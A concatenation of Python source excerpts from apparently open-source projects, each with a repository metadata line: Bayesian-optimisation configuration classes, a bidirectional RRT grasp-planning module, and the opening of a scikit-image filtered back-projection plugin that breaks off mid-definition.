self.ojfchar = {'dx': len(self.aqpara['lb']), 'dev': len(self.aqpara['ev'])}
self.ojf=f
self.path = path
self.fname = fname
return
class pesfsgamma(pesfsdefault):
def __init__(self,*args,**kwargs):
super(pesfsgamma,self).__init__(*args,**kwargs)
D = len(self.aqpara['lb'])
self.reccpara['kindex']=self.aqpara['kindex']= gpbo.core.GPdc.MAT52
self.reccpara['mprior']=self.aqpara['mprior']= sp.array([2.]+[3.]*D)
self.reccpara['sprior']=self.aqpara['sprior']= sp.array([0.5]+[0.15]*D)
self.reccpara['priorshape']=self.aqpara['priorshape']='gamma'
class pesfspredictive(pesfsdefault):
def __init__(self,*args,**kwargs):
super(pesfspredictive,self).__init__(*args,**kwargs)
D = len(self.aqpara['lb'])
self.reccpara['kindex']=self.aqpara['kindex']= GPdc.MAT52
self.reccpara['mprior']=self.aqpara['mprior']= sp.array([2.]+[3.]*D)
self.reccpara['sprior']=self.aqpara['sprior']= sp.array([0.5]+[0.15]*D)
self.reccpara['priorshape']=self.aqpara['priorshape']='gamma'
self.aqpara['weighted']=2
class pesvsdefault():
def __init__(self,f,cfn,D,n,lsl,lsu,path,fname):
self.aqfn = gpbo.core.acquisitions.PESvsaq
self.aqpara= {
'ev': {'s': lsu, 'd': [sp.NaN]},
'lb': [-1.]*D,
'ub': [1.]*D,
'nrandinit': 10,
'maxf': 500+100*D,
'mprior': sp.array([1.]+[0.]*D),
'sprior': sp.array([1.]*(D+1)),
'kindex': GPdc.MAT52,
'DH_SAMPLES': 16+6*D,
'DM_SAMPLES': 20+8*D,
'DM_SUPPORT': 750+250*D,
'SUPPORT_MODE': [gpbo.core.ESutils.SUPPORT_LAPAPROT],
'DM_SLICELCBPARA': 12+4*D,
'noS': False,
'logsu': lsu,
'logsl': lsl,
'sinitrand':True,
'overhead':'None',
'cfn': cfn,
'traincfn':'llog1d',
'dpara': {'user_data': [],
'algmethod': 1,
'maxf': 500+100*D,
'logfilename': '/dev/null'},
'lpara': {'gtol': 0.00001,
'maxfun': 200}
}
self.stoppara = {'nmax': n}
self.stopfn = gpbo.core.optimize.nstopfn
self.reccfn = gpbo.core.reccomenders.gphinrecc
self.reccpara = {
'ev':self.aqpara['ev'],
'lb':self.aqpara['lb'],
'ub':self.aqpara['ub'],
'mprior':self.aqpara['mprior'],
'sprior':self.aqpara['sprior'],
'kindex':self.aqpara['kindex'],
'maxf':500+100*D,
'onlyafter':self.aqpara['nrandinit'],
'check':True,
'dpara':self.aqpara['dpara'],
'lpara':self.aqpara['lpara'],
'everyn':1
}
self.ojfchar = {'dx': len(self.aqpara['lb']), 'dev': len(self.aqpara['ev'])}
self.ojf=f
self.path = path
self.fname = fname
return
class pesbsdefault():
def __init__(self,f,D,n,s,path,fname):
self.aqfn = gpbo.core.acquisitions.PESbsaq
self.aqpara = {
'ev':{'s':s,'d':[sp.NaN],'xa':0.},
'lb':[-1.] * D,
'ub':[ 1.] * D,
'maxf':500+250*(D+1),
'mprior': sp.array([1.]+[0.]*(D+1)),
'sprior': sp.array([1.]*(D+2)),
'kindex':GPdc.MAT52,
'DH_SAMPLES':16+6*D,
'DM_SAMPLES':20+8*D,
'hyp_chains':1,
'DM_SUPPORT':750+250*D,
'SUPPORT_MODE':[gpbo.core.ESutils.SUPPORT_LAPAPROT],
'DM_SLICELCBPARA':12+4*D,
'noS':False,
'nrandinit':20,
'cfn':lambda x,ev:42.,
'traincfn':True,
'xau':1.,
'xal':0.,
'startmode':'inline',
'overhead':'last',
'initpoints':[0.5,0.75,0.875],
'dpara': {'user_data': [],
'algmethod': 1,
'maxf': 500+100*D,
'logfilename': '/dev/null'},
'lpara': {'gtol': 0.00001,
'maxfun': 200}
}
self.stoppara = {'nmax': n}
self.stopfn = gpbo.core.optimize.nstopfn
self.reccfn = gpbo.core.reccomenders.gphinasrecc
self.reccpara = {
'ev': self.aqpara['ev'],
'lb': self.aqpara['lb'],
'ub': self.aqpara['ub'],
'mprior': self.aqpara['mprior'],
'sprior': self.aqpara['sprior'],
'kindex': self.aqpara['kindex'],
'maxf': 500+100*D, #10**(-min(12,max(6.,3*D))),
'onlyafter': self.aqpara['nrandinit'],
'check': True,
'dpara':self.aqpara['dpara'],
'lpara':self.aqpara['lpara'],
'everyn': 1
}
self.ojfchar = {'dx': len(self.aqpara['lb']), 'dev': len(self.aqpara['ev'])}
self.ojf=f
self.path = path
self.fname = fname
return
class pesbslearns():
def __init__(self,f,D,n,s,path,fname):
self.aqfn = gpbo.core.acquisitions.PESbsaq
self.aqpara = {
'ev':{'s':s,'d':[sp.NaN],'xa':0.},
'lb':[-1.] * D,
'ub':[ 1.] * D,
'maxf':500+100*D,
'mprior': sp.array([1.]+[0.]*(D+1)+[-3]),
'sprior': sp.array([1.]*(D+2)+[3]),
'kindex':GPdc.MAT52CS,
'DH_SAMPLES':16,
'DM_SAMPLES':32,
'DM_SUPPORT':1000,
'SUPPORT_MODE':[gpbo.core.ESutils.SUPPORT_LAPAPROT],
'DM_SLICELCBPARA':16.,
'noS':False,
'nrandinit':20,
'cfn':lambda x,ev:42.,
'traincfn':True,
'xau':1.,
'xal':0.,
'startmode':'inline',
'initpoints':[0.5,0.75,0.875],
'dpara': {'user_data': [],
'algmethod': 1,
'maxf': 500+100*D,
'logfilename': '/dev/null'},
'lpara': {'gtol': 0.00001,
'maxfun': 200}
}
self.stoppara = {'nmax': n}
self.stopfn = gpbo.core.optimize.nstopfn
self.reccfn = gpbo.core.reccomenders.gphinasrecc
self.reccpara = {
'ev': self.aqpara['ev'],
'lb': self.aqpara['lb'],
'ub': self.aqpara['ub'],
'mprior': self.aqpara['mprior'],
'sprior': self.aqpara['sprior'],
'kindex': self.aqpara['kindex'],
'maxf': 500+100*D,
'onlyafter': self.aqpara['nrandinit'],
'check': True,
'dpara':self.aqpara['dpara'],
'lpara':self.aqpara['lpara'],
'everyn': 1
}
self.ojfchar = {'dx': len(self.aqpara['lb']), 'dev': len(self.aqpara['ev'])}
self.ojf=f
self.path = path
self.fname = fname
return
class switchdefault():
"""
fixed s, space is [-1,1]^D
"""
def __init__(self, f, D, ninit,nstop, s, path, fname):
#the first acquisition function is standard PES
C = gpbo.core.config.pesfspredictive(f, D, 10, s, 'results', 'introspection.csv',ninit=ninit)
aq0 = C.aqfn
aq0para = C.aqpara
#the second acquisition is local exploitation with BFGS
aq1 = gpbo.core.acquisitions.splocalaq
aq1para = {
'ev': {'s': s, 'd': [sp.NaN]},
'lb': [-1.] * D,
'ub': [1.] * D,
'start': [0.] * D
}
#finally the third acquisition is EI using sampled hyperparameters, which will be passed a modified incumbent value to use at each step
C2 = gpbo.core.config.eihypdefault(f, D, ninit, s, 'results', 'introspection.csv')
aq2 = C2.aqfn
aq2para = C2.aqpara
aq2para['priorshape']=aq0para['priorshape']
aq2para['mprior']= aq0para['mprior']
aq2para['sprior']= aq0para['sprior']
aq2para['kindex']= aq0para['kindex']
#the chooser will secet which acquisition is used at each step
self.chooser = gpbo.core.choosers.globallocalregret
self.choosepara = {
'ev': aq0para['ev'],
'lb': aq0para['lb'],
'ub': aq0para['ub'],
'mprior': aq0para['mprior'],
'sprior': aq0para['sprior'],
'kindex': aq0para['kindex'],
'priorshape': aq0para['priorshape'],
'nhyp' : aq0para['DH_SAMPLES'],
'onlyafter': aq0para['nrandinit'],
'weighted': aq0para['weighted'],
'check': True,
'everyn': 1,
'support': 1500,
'draws': 10000,
'regretswitch':1e-4,
'dpara': {'user_data': [],
'algmethod': 1,
'maxf': 2000,
'logfilename': '/dev/null'},
'lpara': {'gtol': 0.00001,
'maxfun': 400},
'pvetol':1e-2,
'lineSh':1e-4,
'rotate':True,
'nlineS':30+10*D
}
self.aqfn = [aq0,aq1,aq2]
self.aqpara = [aq0para,aq1para,aq2para]
self.multimode = True
self.stoppara = {'nmax': nstop}
self.stopfn = gpbo.core.optimize.norlocalstopfn
reccfn0 = C.reccfn
reccpara0 = C.reccpara
reccpara0['smode']='dthenl'
reccfn1 = gpbo.core.reccomenders.argminrecc
reccpara1 = {'check': True}
self.reccfn = [reccfn0,reccfn1,reccfn0]
self.reccpara = [reccpara0,reccpara1,reccpara0]
self.ojfchar = {'dx': len(aq0para['lb']), 'dev': len(aq0para['ev'])}
self.ojf = f
self.path = path
self.fname = fname
return
class directdefault:
def __init__(self, f, D, n, s, path, fname):
self.aqfn = gpbo.core.acquisitions.directaq
self.aqpara = {
'ev': {'s': s, 'd': [sp.NaN]},
'lb': [-1.] * D,
'ub': [1.] * D
}
self.stoppara = {'nmax': n}
self.stopfn = gpbo.core.optimize.norlocalstopfn
self.reccfn = gpbo.core.reccomenders.argminrecc
self.reccpara = {
'ev': self.aqpara['ev'],
'check': True
}
self.ojfchar = {'dx': len(self.aqpara['lb']), 'dev': len(self.aqpara['ev'])}
self.ojf = f
self.path = path
self.fname = fname
return
class cmaesdefault:
def __init__(self, f, D, n, s, path, fname):
self.aqfn = gpbo.core.acquisitions.cmaesaq
self.aqpara = {
'ev': {'s': s, 'd': [sp.NaN]},
'lb': [-1.] * D,
'ub': [1.] * D
}
self.stoppara = {'nmax': n}
self.stopfn = gpbo.core.optimize.norlocalstopfn
self.reccfn = gpbo.core.reccomenders.argminrecc
self.reccpara = {
'ev': self.aqpara['ev'],
'check': True
}
self.ojfchar = {'dx': len(self.aqpara['lb']), 'dev': len(self.aqpara['ev'])}
self.ojf = f
self.path = path
self.fname = fname
return
| markm541374/gpbo | gpbo/core/config.py | Python | agpl-3.0 | 19,809 | 0.01575 |
#!/usr/bin/env python
""" This is a draft modification of the RRT algorithm for the sepcial case
that sampling the goal region is computationally expensive """
import random
import numpy
import time
import math
import logging
import copy
from rtree import index
class SampleData:
def __init__(self, config, data=None, data_copy_fn=copy.deepcopy, id_num=-1):
self._config = config
self._id = id_num
self._data = data
self._dataCopyFct = data_copy_fn
def get_configuration(self):
return self._config
def get_data(self):
return self._data
def copy(self):
copied_data = None
if self._data is not None:
copied_data = self._dataCopyFct(self._data)
return SampleData(numpy.copy(self._config), copied_data, data_copy_fn=self._dataCopyFct, id_num=self._id)
def is_valid(self):
return self._config is not None
def is_equal(self, other_sample_data):
return (self._config == other_sample_data._config).all() and self._data == other_sample_data._data
def get_id(self):
return self._id
def __repr__(self):
return self.__str__()
def __str__(self):
return "{SampleData:[Config=" + str(self._config) + "; Data=" + str(self._data) + "]}"
class TreeNode(object):
def __init__(self, nid, pid, data):
self._id = nid
self._parent = pid
self._data = data
self._children = []
def get_sample_data(self):
return self._data
def get_id(self):
return self._id
def get_parent_id(self):
return self._parent
def add_child_id(self, cid):
self._children.append(cid)
def get_children(self):
return self._children
def __str__(self):
return "{TreeNode: [id=" + str(self._id) + ", Data=" + str(self._data) + "]}"
class Tree(object):
TREE_ID = 0
def __init__(self, root_data, b_forward_tree=True):
self._nodes = [TreeNode(0, 0, root_data.copy())]
self._labeled_nodes = []
self._node_id = 1
self._b_forward_tree = b_forward_tree
self._tree_id = Tree.TREE_ID + 1
Tree.TREE_ID += 1
def add(self, parent, child_data):
"""
Adds the given data as a child node of parent.
@param parent: Must be of type TreeNode and denotes the parent node.
@param child_data: SampleData that is supposed to be saved in the child node (it is copied).
"""
child_node = TreeNode(self._node_id, parent.get_id(), child_data.copy())
parent.add_child_id(child_node.get_id())
self._nodes.append(child_node)
# self._parents.append(parent.get_id())
# assert(len(self._parents) == self._node_id + 1)
self._node_id += 1
return child_node
def get_id(self):
return self._tree_id
def add_labeled_node(self, node):
self._labeled_nodes.append(node)
def get_labeled_nodes(self):
return self._labeled_nodes
def clear_labeled_nodes(self):
self._labeled_nodes = []
def remove_labeled_node(self, node):
if node in self._labeled_nodes:
self._labeled_nodes.remove(node)
def nearest_neighbor(self, sample):
pass
def extract_path(self, goal_node):
path = [goal_node.get_sample_data()]
current_node = goal_node
while current_node.get_id() != 0:
current_node = self._nodes[current_node.get_parent_id()]
path.append(current_node.get_sample_data())
path.reverse()
return path
def get_root_node(self):
return self._nodes[0]
def size(self):
return len(self._nodes)
def merge(self, merge_node_a, other_tree, merge_node_b):
"""
Merges this tree with the given tree. The connection is established through nodeA and nodeB,
for which it is assumed that both nodeA and nodeB represent the same configuration.
In other words, both the parent and all children of nodeB become children of nodeA.
Labeled nodes of tree B will be added as labeled nodes of tree A.
Runtime: O(size(otherTree) * num_labeled_nodes(otherTree))
@param merge_node_a The node of this tree where to attach otherTree
@param other_tree The other tree (is not changed)
@param merge_node_b The node of tree B that is merged with mergeNodeA from this tree.
@return The root of treeB as a TreeNode of treeA after the merge.
"""
node_stack = [(merge_node_a, merge_node_b, None)]
b_root_node_in_a = None
while len(node_stack) > 0:
(current_node_a, current_node_b, ignore_id) = node_stack.pop()
for child_id in current_node_b.get_children():
if child_id == ignore_id: # prevent adding duplicates
continue
child_node_b = other_tree._nodes[child_id]
child_node_a = self.add(current_node_a, child_node_b.get_sample_data())
if child_node_b in other_tree._labeled_nodes:
self.add_labeled_node(child_node_a)
node_stack.append((child_node_a, child_node_b, current_node_b.get_id()))
# In case current_node_b is not the root of B, we also need to add the parent
# as a child in this tree.
parent_id = current_node_b.get_parent_id()
if current_node_b.get_id() != parent_id:
if parent_id != ignore_id: # prevent adding duplicates
parent_node_b = other_tree._nodes[current_node_b.get_parent_id()]
child_node_a = self.add(current_node_a, parent_node_b.get_sample_data())
node_stack.append((child_node_a, parent_node_b, current_node_b.get_id()))
if parent_node_b in other_tree._labeled_nodes:
self.add_labeled_node(child_node_a)
else: # save the root to return it
b_root_node_in_a = current_node_a
return b_root_node_in_a
class SqrtTree(Tree):
def __init__(self, root):
super(SqrtTree, self).__init__(root)
self.offset = 0
def add(self, parent, child):
child_node = super(SqrtTree, self).add(parent, child)
self._update_stride()
return child_node
# def clear(self):
# super(SqrtTree, self).clear()
# self.offset = 0
# self.stride = 0
def nearest_neighbor(self, q):
"""
Computes an approximate nearest neighbor of q.
To keep the computation time low, this method only considers sqrt(n)
nodes, where n = #nodes.
This implementation is essentially a copy from:
http://ompl.kavrakilab.org/NearestNeighborsSqrtApprox_8h_source.html
@return The tree node (Type TreeNode) for which the data point is closest to q.
"""
d = float('inf')
nn = None
if self.stride > 0:
for i in range(0, self.stride):
pos = (i * self.stride + self.offset) % len(self._nodes)
n = self._nodes[pos]
dt = numpy.linalg.norm(q - n.get_sample_data().get_configuration())
if dt < d:
d = dt
nn = n
self.offset = random.randint(0, self.stride)
return nn
def _update_stride(self):
self.stride = int(1 + math.floor(math.sqrt(len(self._nodes))))
class RTreeTree(Tree):
def __init__(self, root, dimension, scaling_factors, b_forward_tree=True):
super(RTreeTree, self).__init__(root, b_forward_tree=b_forward_tree)
self._scaling_factors = scaling_factors
self._create_index(dimension)
self.dimension = dimension
self._add_to_idx(self._nodes[0])
def add(self, parent, child_data):
child_node = super(RTreeTree, self).add(parent, child_data)
self._add_to_idx(child_node)
return child_node
def nearest_neighbor(self, sample_data):
if len(self._nodes) == 0:
return None
point_list = list(sample_data.get_configuration())
point_list = map(lambda x, y: math.sqrt(x) * y, self._scaling_factors, point_list)
point_list += point_list
nns = list(self.idx.nearest(point_list))
return self._nodes[nns[0]]
def _add_to_idx(self, child_node):
point_list = list(child_node.get_sample_data().get_configuration())
point_list = map(lambda x, y: math.sqrt(x) * y, self._scaling_factors, point_list)
point_list += point_list
self.idx.insert(child_node.get_id(), point_list)
def _create_index(self, dim):
prop = index.Property()
prop.dimension = dim
self.idx = index.Index(properties=prop)
class Constraint(object):
def project(self, old_config, config):
return config
class ConstraintsManager(object):
def __init__(self, callback_function=None):
self._constraints_storage = {}
self._active_constraints = []
self._new_tree_callback = callback_function
def project(self, old_config, config):
if len(self._active_constraints) == 0:
return config
# For now we just iterate over all constraints and project successively
for constraint in self._active_constraints:
config = constraint.project(old_config, config)
return config
def set_active_tree(self, tree):
if tree.get_id() in self._constraints_storage:
self._active_constraints.extend(self._constraints_storage[tree.get_id()])
def reset_constraints(self):
self._active_constraints = []
def clear(self):
self._active_constraints = []
self._constraints_storage = {}
def register_new_tree(self, tree):
if self._new_tree_callback is not None:
self._constraints_storage[tree.get_id()] = self._new_tree_callback(tree)
class PGoalProvider(object):
def compute_p_goal(self, num_trees):
pass
class ConstPGoalProvider(PGoalProvider):
def __init__(self, p_goal):
self._pGoal = p_goal
def compute_p_goal(self, num_trees):
logging.debug('[ConstPGoalProvider::compute_p_goal] Returning constant pGoal')
if num_trees == 0:
return 1.0
return self._pGoal
class DynamicPGoalProvider(PGoalProvider):
def __init__(self, p_max=0.8, goal_w=1.2, p_goal_min=0.01):
self._pMax = p_max
self._goalW = goal_w
self._pGoalMin = p_goal_min
def compute_p_goal(self, num_trees):
logging.debug('[DynamicPGoalProvider::compute_p_goal] Returning dynamic pGoal')
return self._pMax * math.exp(-self._goalW * num_trees) + self._pGoalMin
class StatsLogger:
def __init__(self):
self.num_backward_trees = 0
self.num_goals_sampled = 0
self.num_valid_goals_sampled = 0
self.num_approx_goals_sampled = 0
self.num_attempted_tree_connects = 0
self.num_successful_tree_connects = 0
self.num_goal_nodes_sampled = 0
self.num_c_free_samples = 0
self.num_accumulated_logs = 1
self.final_grasp_quality = 0.0
self.runtime = 0.0
self.success = 0
self.treeSizes = {}
def clear(self):
self.num_backward_trees = 0
self.num_goals_sampled = 0
self.num_valid_goals_sampled = 0
self.num_approx_goals_sampled = 0
self.num_attempted_tree_connects = 0
self.num_successful_tree_connects = 0
self.num_goal_nodes_sampled = 0
self.num_c_free_samples = 0
self.num_accumulated_logs = 1
self.final_grasp_quality = 0.0
self.runtime = 0.0
self.success = 0
self.treeSizes = {}
def to_dict(self):
a_dict = {'numBackwardTrees': self.num_backward_trees, 'numGoalSampled': self.num_goals_sampled,
'numValidGoalSampled': self.num_valid_goals_sampled,
'numApproxGoalSampled': self.num_approx_goals_sampled,
'numGoalNodesSampled': self.num_goal_nodes_sampled,
'numSuccessfulTreeConnects': self.num_successful_tree_connects,
'numCFreeSamples': self.num_c_free_samples, 'finalGraspQuality': float(self.final_grasp_quality),
'runtime': self.runtime, 'success': self.success}
return a_dict
def print_logs(self):
print 'Logs:'
print ' num_backward_trees(avg): ', self.num_backward_trees
print ' num_goals_sampled(avg): ', self.num_goals_sampled
print ' num_valid_goals_sampled(avg): ', self.num_valid_goals_sampled
print ' num_approx_goals_sampled(avg): ', self.num_approx_goals_sampled
print ' num_goal_nodes_sampled(avg): ', self.num_goal_nodes_sampled
print ' num_attempted_tree_connects(avg): ', self.num_attempted_tree_connects
print ' num_successful_tree_connects(avg): ', self.num_successful_tree_connects
print ' num_c_free_samples(avg): ', self.num_c_free_samples
print ' final_grasp_quality(avg): ', self.final_grasp_quality
print ' runtime(avg): ', self.runtime
print ' success(avg): ', self.success
if self.num_accumulated_logs == 1:
print ' treeSizes: ', self.treeSizes
def accumulate(self, other_logger):
self.num_backward_trees += other_logger.numBackwardTrees
self.num_goals_sampled += other_logger.numGoalSampled
self.num_valid_goals_sampled += other_logger.numValidGoalSampled
self.num_approx_goals_sampled += other_logger.numApproxGoalSampled
self.num_attempted_tree_connects += other_logger.numAttemptedTreeConnects
self.num_successful_tree_connects += other_logger.numSuccessfulTreeConnects
self.num_goal_nodes_sampled += other_logger.numGoalNodesSampled
self.num_c_free_samples += other_logger.numCFreeSamples
self.num_accumulated_logs += other_logger.numAccumulatedLogs
self.final_grasp_quality += other_logger.finalGraspQuality
self.runtime += other_logger.runtime
self.success += other_logger.success
self.treeSizes.update(other_logger.treeSizes)
def finalize_accumulation(self):
self.num_backward_trees = float(self.num_backward_trees) / float(self.num_accumulated_logs)
self.num_goals_sampled = float(self.num_goals_sampled) / float(self.num_accumulated_logs)
self.num_valid_goals_sampled = float(self.num_valid_goals_sampled) / float(self.num_accumulated_logs)
self.num_approx_goals_sampled = float(self.num_approx_goals_sampled) / float(self.num_accumulated_logs)
self.num_attempted_tree_connects = float(self.num_attempted_tree_connects) / float(self.num_accumulated_logs)
self.num_successful_tree_connects = float(self.num_successful_tree_connects) / float(self.num_accumulated_logs)
self.num_goal_nodes_sampled = float(self.num_goal_nodes_sampled) / float(self.num_accumulated_logs)
self.final_grasp_quality /= float(self.num_accumulated_logs)
self.runtime /= float(self.num_accumulated_logs)
self.success /= float(self.num_accumulated_logs)
self.num_c_free_samples = float(self.num_c_free_samples) / float(self.num_accumulated_logs)
class RRT:
def __init__(self, p_goal_provider, c_free_sampler, goal_sampler, logger, pgoal_tree=0.8,
constraints_manager=None): # pForwardTree, pConnectTree
""" Initializes the RRT planner
@param pGoal - Instance of PGoalProvider that provides a probability of sampling a new goal
@param c_free_sampler - A sampler of c_free.
@param goal_sampler - A sampler of the goal region.
@param logger - A logger (of type Logger) for printouts.
@param constraints_manager - (optional) a constraint manager.
"""
self.p_goal_provider = p_goal_provider
self.p_goal_tree = pgoal_tree
self.goal_sampler = goal_sampler
self.c_free_sampler = c_free_sampler
self.logger = logger
self.stats_logger = StatsLogger()
# self.debugConfigList = []
if constraints_manager is None:
constraints_manager = ConstraintsManager()
self._constraints_manager = constraints_manager
def extend(self, tree, random_sample, add_intermediates=True, add_tree_step=10):
self._constraints_manager.set_active_tree(tree)
nearest_node = tree.nearest_neighbor(random_sample)
(bConnected, samples) = self.c_free_sampler.interpolate(nearest_node.get_sample_data(), random_sample,
projection_function=self._constraints_manager.project)
parent_node = nearest_node
self.logger.debug('[RRT::extend We have ' + str(len(samples) - 1) + " intermediate configurations")
if add_intermediates:
for i in range(add_tree_step, len(samples) - 1, add_tree_step):
parent_node = tree.add(parent_node, samples[i].copy())
if len(samples) > 1:
last_node = tree.add(parent_node, samples[-1].copy())
else:
# self.debugConfigList.extend(samples)
last_node = parent_node
return last_node, bConnected
def pick_nearest_tree(self, sample, backward_trees):
nn = None
dist = float('inf')
tree = None
for treeTemp in backward_trees:
nn_temp = treeTemp.nearest_neighbor(sample)
dist_temp = self.c_free_sampler.distance(sample.get_configuration(),
nn_temp.get_sample_data().get_configuration())
if dist_temp < dist:
dist = dist_temp
nn = nn_temp
tree = treeTemp
return tree, nn
def proximity_birrt(self, start_config, time_limit=60, debug_function=lambda x, y: None,
shortcut_time=5.0, timer_function=time.time):
""" Bidirectional RRT algorithm with hierarchical goal region that
uses free space proximity to bias sampling. """
if not self.c_free_sampler.is_valid(start_config):
self.logger.info('[RRT::proximityBiRRT] Start configuration is invalid. Aborting.')
return None
from sampler import FreeSpaceProximitySampler, FreeSpaceModel, ExtendedFreeSpaceModel
assert type(self.goal_sampler) == FreeSpaceProximitySampler
self.goal_sampler.clear()
self.stats_logger.clear()
self._constraints_manager.clear()
# Create free space memories that our goal sampler needs
connected_free_space = FreeSpaceModel(self.c_free_sampler)
non_connected_free_space = ExtendedFreeSpaceModel(self.c_free_sampler)
self.goal_sampler.set_connected_space(connected_free_space)
self.goal_sampler.set_non_connected_space(non_connected_free_space)
# Create forward tree
forward_tree = RTreeTree(SampleData(start_config), self.c_free_sampler.get_space_dimension(),
self.c_free_sampler.get_scaling_factors())
self._constraints_manager.register_new_tree(forward_tree)
connected_free_space.add_tree(forward_tree)
# Various variable initializations
backward_trees = []
goal_tree_ids = []
b_path_found = False
path = None
b_searching_forward = True
# self.debugConfigList = []
# Start
start_time = timer_function()
debug_function(forward_tree, backward_trees)
# Main loop
self.logger.debug('[RRT::proximityBiRRT] Starting planning loop')
while timer_function() < start_time + time_limit and not b_path_found:
debug_function(forward_tree, backward_trees)
p = random.random()
p_goal = self.p_goal_provider.compute_p_goal(len(backward_trees))
self.logger.debug('[RRT::proximityBiRRT] Rolled a die: ' + str(p) + '. p_goal is ' +
str(p_goal))
if p < p_goal:
# Create a new backward tree
self.logger.debug('[RRT::proximityBiRRT] Sampling a new goal configuration')
goal_sample = self.goal_sampler.sample()
self.stats_logger.num_goals_sampled += 1
self.logger.debug('[RRT::proximityBiRRT] Sampled a new goal: ' + str(goal_sample))
if goal_sample.is_valid():
backward_tree = RTreeTree(goal_sample, self.c_free_sampler.get_space_dimension(),
self.c_free_sampler.get_scaling_factors(), b_forward_tree=False)
self._constraints_manager.register_new_tree(backward_tree)
if self.goal_sampler.is_goal(goal_sample):
self.stats_logger.num_valid_goals_sampled += 1
self.logger.debug('[RRT::proximityBiRRT] Goal sample is valid.' +
' Created new backward tree')
goal_tree_ids.append(backward_tree.get_id())
else:
self.stats_logger.num_approx_goals_sampled += 1
self.logger.debug('[RRT::proximityBiRRT] Goal sample is valid, but approximate.' +
' Created new approximate backward tree')
self.stats_logger.num_backward_trees += 1
backward_trees.append(backward_tree)
non_connected_free_space.add_tree(backward_tree)
else:
# Extend search trees
self.logger.debug('[RRT::proximityBiRRT] Extending search trees')
self._constraints_manager.reset_constraints()
random_sample = self.c_free_sampler.sample()
self.logger.debug('[RRT::proximityBiRRT] Drew random sample: ' + str(random_sample))
self.stats_logger.num_c_free_samples += 1
(forward_node, backward_node, backward_tree, b_connected) = (None, None, None, False)
if b_searching_forward or len(backward_trees) == 0:
self.logger.debug('[RRT::proximityBiRRT] Extending forward tree to random sample')
(forward_node, b_connected) = self.extend(forward_tree, random_sample)
self.logger.debug('[RRT::proximityBiRRT] Forward tree connected to sample: ' + str(b_connected))
self.logger.debug('[RRT::proximityBiRRT] New forward tree node: ' + str(forward_node))
if len(backward_trees) > 0:
self.logger.debug('[RRT::proximityBiRRT] Attempting to connect forward tree ' +
'to backward tree')
(backward_tree, nearest_node) = \
self.pick_nearest_tree(forward_node.get_sample_data(), backward_trees)
(backward_node, b_connected) = self.extend(backward_tree, forward_node.get_sample_data())
else:
b_connected = False
else:
self.logger.debug('[RRT::proximityBiRRT] Extending backward tree to random sample')
# TODO try closest tree instead
backward_tree = self.pick_backward_tree(backward_trees,
goal_tree_ids)
# (backward_tree, nearest_node) = self._biRRT_helper_nearestTree(random_sample, backward_trees)
if backward_tree.get_id() in goal_tree_ids:
self.logger.debug('[RRT::proximityBiRRT] Attempting to connect goal tree!!!!')
(backward_node, b_connected) = self.extend(backward_tree, random_sample)
self.logger.debug('[RRT::proximityBiRRT] New backward tree node: ' + str(backward_node))
self.logger.debug('[RRT::proximityBiRRT] Backward tree connected to sample: ' +
str(b_connected))
self.logger.debug('[RRT::proximityBiRRT] Attempting to connect forward tree ' +
'to backward tree ' + str(backward_tree.get_id()))
(forward_node, b_connected) = self.extend(forward_tree, backward_node.get_sample_data())
self.stats_logger.num_attempted_tree_connects += 1
if b_connected:
self.logger.debug('[RRT::proximityBiRRT] Trees connected')
self.stats_logger.num_successful_tree_connects += 1
tree_name = 'merged_backward_tree' + str(self.stats_logger.num_successful_tree_connects)
self.stats_logger.treeSizes[tree_name] = backward_tree.size()
root_b = forward_tree.merge(forward_node, backward_tree, backward_node)
backward_trees.remove(backward_tree)
non_connected_free_space.remove_tree(backward_tree.get_id())
# Check whether we connected to a goal tree or not
if backward_tree.get_id() in goal_tree_ids:
goal_tree_ids.remove(backward_tree.get_id())
path = forward_tree.extract_path(root_b)
b_path_found = True
self.logger.debug('[RRT::proximityBiRRT] Found a path!')
b_searching_forward = not b_searching_forward
self.stats_logger.treeSizes['forward_tree'] = forward_tree.size()
for bw_tree in backward_trees:
self.stats_logger.treeSizes['unmerged_backward_tree' + str(bw_tree.get_id())] = bw_tree.size()
debug_function(forward_tree, backward_trees)
self.goal_sampler.debug_draw()
self.stats_logger.num_goal_nodes_sampled = self.goal_sampler.get_num_goal_nodes_sampled()
self.stats_logger.runtime = timer_function() - start_time
if path is not None:
self.stats_logger.final_grasp_quality = self.goal_sampler.get_quality(path[-1])
self.stats_logger.success = 1
return self.shortcut(path, shortcut_time)
def pick_backward_tree(self, backward_trees, goal_tree_ids):
p = random.random()
goal_trees = [x for x in backward_trees if x.get_id() in goal_tree_ids]
non_goal_trees = [x for x in backward_trees if x.get_id() not in goal_tree_ids]
if p < self.p_goal_tree and len(goal_tree_ids) > 0:
return random.choice(goal_trees)
elif len(non_goal_trees) > 0:
return random.choice(non_goal_trees)
elif len(backward_trees) > 0: # this may happen if we have only goal trees, but p >= self.pGoalTree
return random.choice(backward_trees)
else:
raise ValueError('We do not have any backward trees to pick from')
def shortcut(self, path, time_limit):
if path is None:
return None
self.logger.debug('[RRT::shortcut] Shortcutting path of length %i with time limit %f' % (len(path),
time_limit))
start_time = time.clock()
all_pairs = [(i, j) for i in range(len(path)) for j in range(i + 2, len(path))]
random.shuffle(all_pairs)
while time.clock() < start_time + time_limit and len(all_pairs) > 0:
index_pair = all_pairs.pop()
(bSuccess, samples) = self.c_free_sampler.interpolate(path[index_pair[0]], path[index_pair[1]])
if bSuccess:
path[index_pair[0] + 1:] = path[index_pair[1]:]
all_pairs = [(i, j) for i in range(len(path)) for j in range(i + 2, len(path))]
random.shuffle(all_pairs)
self.logger.debug('[RRT::shortcut] Shorcutting finished. New path length %i' % len(path))
return path
| kth-ros-pkg/hfts_grasp_planner | src/hfts_grasp_planner/rrt.py | Python | bsd-3-clause | 28,198 | 0.003511 |
import logging
from savu.plugins.base_recon import BaseRecon
from savu.data.process_data import CitationInfomration
from savu.plugins.cpu_plugin import CpuPlugin
import skimage.transform as transform
import numpy as np
from scipy import ndimage
class ScikitimageFilterBackProjection(BaseRecon, CpuPlugin):
"""
A Plugin to reconstruct an image by filter back projection
using the inverse radon transform from scikit-image.
:param output_size: Number of rows and columns in the
reconstruction. Default: None.
:param filter: Filter used in frequency domain filtering
Ramp filter used by default. Filters available: ramp, shepp-logan,
cosine, hamming, hann. Assign None to use no filter. Default: 'ramp'.
:param interpolation: interpolation method used in reconstruction.
Methods available: 'linear', 'nearest', and 'cubic' ('cubic' is slow).
Default: 'linear'.
:param circle: Assume the reconstructed image is zero outside the inscribed
circle. Also changes the default output_size to match the behaviour of
radon called with circle=True. Default: False.
"""
def __init__(self):
